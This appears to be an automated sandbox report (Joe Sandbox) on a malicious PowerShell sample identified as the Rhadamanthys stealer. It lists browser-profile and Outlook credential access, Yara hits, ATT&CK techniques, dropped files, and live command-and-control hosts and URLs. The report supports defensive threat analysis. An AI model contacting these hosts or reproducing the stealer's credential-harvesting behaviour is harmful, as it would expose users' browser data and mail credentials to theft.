Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\091tobv5.default-release\settings\main\ms-language-packs	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\025af778-db9d-49f0-b172-4eb563717cb5	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\091tobv5.default-release\cache2\entries	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\091tobv5.default-release\settings\main\ms-language-packs\browser	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\091tobv5.default-release	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dtbqpus9.default	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\091tobv5.default-release\thumbnails	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\091tobv5.default-release\cache2\doomed	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\091tobv5.default-release\settings\main	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\091tobv5.default-release\startupCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\091tobv5.default-release\safebrowsing	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\System32\OpenWith.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Jump to behavior

Source: C:\Windows\System32\OpenWith.exe

Directory queried: C:\Users\user\Documents\AQRFEVRTGL

Jump to behavior

Source: Yara match

File source: Process Memory Space: OpenWith.exe PID: 5952, type: MEMORYSTR

Remote Access Functionality

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 4.2.nUCp.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.1419467605.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1766148892.0000011F7B611000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1463969465.0000000004550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1511743151.0000011F7B4C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1511532978.0000011F7B411000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1389217701.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1393293145.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1393080101.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E4D1B18 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,	6_3_00007DF46E4D1B18
Source: C:\Windows\System32\OpenWith.exe	Code function: 6_3_00007DF46E504088 socket,bind,	6_3_00007DF46E504088
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 8_2_0000021CE78ECDF4 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,	8_2_0000021CE78ECDF4

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Obfuscated Files or Information	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	212 Process Injection	111 Software Packing	21 Input Capture	13 File and Directory Discovery	Remote Desktop Protocol	21 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	1 Credentials in Registry	136 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Masquerading	NTDS	341 Security Software Discovery	Distributed Component Object Model	21 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	31 Virtualization/Sandbox Evasion	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	212 Process Injection	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
qsKo.ps1	21%	ReversingLabs	Win32.Trojan.Generic
qsKo.ps1	19%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\Documents\nUCp.mp3	100%	Avira	TR/Crypt.ZPACK.Gen8
C:\Users\Public\Documents\nUCp.mp3	100%	Joe Sandbox ML
C:\Users\Public\Documents\nUCp.exe (copy)	61%	ReversingLabs	Win32.Trojan.Generic
C:\Users\Public\Documents\nUCp.exe (copy)	82%	Virustotal		Browse
C:\Users\Public\Documents\nUCp.mp3	61%	ReversingLabs	Win32.Trojan.Generic
C:\Users\Public\Documents\nUCp.mp3	82%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
captcha.serverprotect.online	0%	Virustotal		Browse
deadmunky.nl	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://discord.com	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
https://captcha.serverprotect.online	0%	Avira URL Cloud	safe
http://crl.microsoft	0%	Avira URL Cloud	safe
http://microsoft.co	0%	Avira URL Cloud	safe
https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8tkernelbasentdllkernel32GetProcessMitigationPol	0%	Avira URL Cloud	safe
https://go.micro	0%	Avira URL Cloud	safe
https://captcha.serverprotect.online	0%	Virustotal		Browse
https://discord.com	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://captcha.serverprotect.online/98aa7e1c	0%	Avira URL Cloud	safe
http://crl.microsoft	0%	Virustotal		Browse
http://www.microsoft.co	0%	Avira URL Cloud	safe
https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8tkernelbasentdllkernel32GetProcessMitigationPol	17%	Virustotal		Browse
https://discordapp.com	0%	Avira URL Cloud	safe
http://captcha.serverprotect.online	0%	Avira URL Cloud	safe
https://captcha.serverprotect.online/98aa7e1ce731c6206ebbe457e9f2dc7088adc3c628bee08/verify	0%	Avira URL Cloud	safe
http://captcha.serverprotect.online	0%	Virustotal		Browse
http://microsoft.co	1%	Virustotal		Browse
http://www.microsoft.co	1%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://captcha.serverprotect.online/98aa7e1ce731c6206ebbe457e9f2dc7088adc3c628bee08/verify	0%	Virustotal		Browse
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://discordapp.com	0%	Virustotal		Browse
http://www.microsoft.czl	0%	Avira URL Cloud	safe
http://crl.micro	0%	Avira URL Cloud	safe
https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8t	0%	Avira URL Cloud	safe
https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8t(	0%	Avira URL Cloud	safe
https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8t	15%	Virustotal		Browse
https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8t(	17%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
captcha.serverprotect.online	104.21.82.103	true	false	0%, Virustotal, Browse	unknown
deadmunky.nl	194.113.106.180	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://captcha.serverprotect.online/98aa7e1ce731c6206ebbe457e9f2dc7088adc3c628bee08/verify	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8t	true	15%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.1396196856.00000177E6818000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://discord.com	OpenWith.exe, 00000006.00000003.1549035844.0000011F7B715000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://captcha.serverprotect.online	powershell.exe, 00000000.00000002.1371224256.00000177D787B000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1371224256.00000177D69C8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsoft	powershell.exe, 00000000.00000002.1403260797.00000177EEBDE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1371224256.00000177D69C8000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://microsoft.co	powershell.exe, 00000000.00000002.1403260797.00000177EEBDE000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8tkernelbasentdllkernel32GetProcessMitigationPol	OpenWith.exe, 00000005.00000003.1462414332.0000000005184000.00000004.00000020.00020000.00000000.sdmp	true	17%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000000.00000002.1371224256.00000177D787B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://captcha.serverprotect.online/98aa7e1c	powershell.exe, 00000000.00000002.1371224256.00000177D7EA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1371224256.00000177D787B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 00000000.00000002.1403260797.00000177EEBDE000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000000.00000002.1396196856.00000177E6818000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discordapp.com	OpenWith.exe, 00000006.00000003.1549035844.0000011F7B715000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://captcha.serverprotect.online	powershell.exe, 00000000.00000002.1371224256.00000177D7CE5000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000000.00000002.1396196856.00000177E6818000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1371224256.00000177D69C8000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.microsoft.czl	powershell.exe, 00000000.00000002.1403260797.00000177EEBDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.micro	powershell.exe, 00000000.00000002.1403260797.00000177EEBDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000000.00000002.1396196856.00000177E6818000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.1396196856.00000177E6818000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1371224256.00000177D67A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8t(	OpenWith.exe, 00000005.00000002.1462963482.00000000027BC000.00000004.00000010.00020000.00000000.sdmp	true	17%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1371224256.00000177D67A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	OpenWith.exe, 00000006.00000003.1542052579.0000011F7B725000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.82.103	captcha.serverprotect.online	United States		13335	CLOUDFLARENETUS	false
194.113.106.180	deadmunky.nl	Russian Federation		208861	RACKTECHRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1511454
Start date and time:	2024-09-15 15:01:15 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	qsKo.ps1
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winPS1@14/7@2/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 63% Number of executed functions: 168 Number of non-executed functions: 22
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target OpenWith.exe, PID 5860 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7316 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:02:16	API Interceptor	15x Sleep call for process: powershell.exe modified
09:02:52	API Interceptor	1x Sleep call for process: setup_wm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.113.106.180	GsrDwm0DJG.ps1	Get hash	malicious	RHADAMANTHYS	Browse
194.113.106.180	HeggBkMoYE.ps1	Get hash	malicious	RHADAMANTHYS	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
